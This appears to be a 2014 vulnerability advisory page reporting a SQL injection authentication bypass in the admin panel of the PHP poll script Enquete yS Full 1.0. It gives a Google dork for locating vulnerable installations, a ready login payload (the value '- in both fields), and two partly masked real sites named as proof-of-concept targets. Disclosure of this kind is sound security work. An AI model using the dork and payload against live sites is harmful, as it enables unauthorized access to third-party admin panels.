Enquete yS Full 1.0 POST SQL Injection in Panel Admin

2014.05.08
Risk: Medium
Local: No
Remote: Yes
CVE: CWE-89
CWE: N/A

# Enquete yS - Full v. 1.0 POST SQL Injection in Panel Admin # Risk: High # CWE number: CWE-89 # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.com # Date: 08/05/2014 # Vendor Homepage: http://phpbrasil.com/script/AG216GUqK7nS/enquete-ys--full-v-10-yourspotcombr # Version: v1.0 # Tested on: Windows 7 and Gnu/Linux # Google Dork: intitle:ys :: Painel # Url vul : http://host/patch/enquete/admin/ # Exploit: Post in parameters txtUsuario & txtSENHA Post exploit = txtUsuario='-&txtSenha='-&btnLogar=Logar+no+sistema+>> Username = '- and Password = '- # PoC : http://www.sercolaXdm.com.br/adm/enquete/admin/ http://www.sgnXet-rs.com.br/scripts/enquete/admin/

References:

http://phpbrasil.com/script/AG216GUqK7nS/enquete-ys--full-v-10-yourspotcombr


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top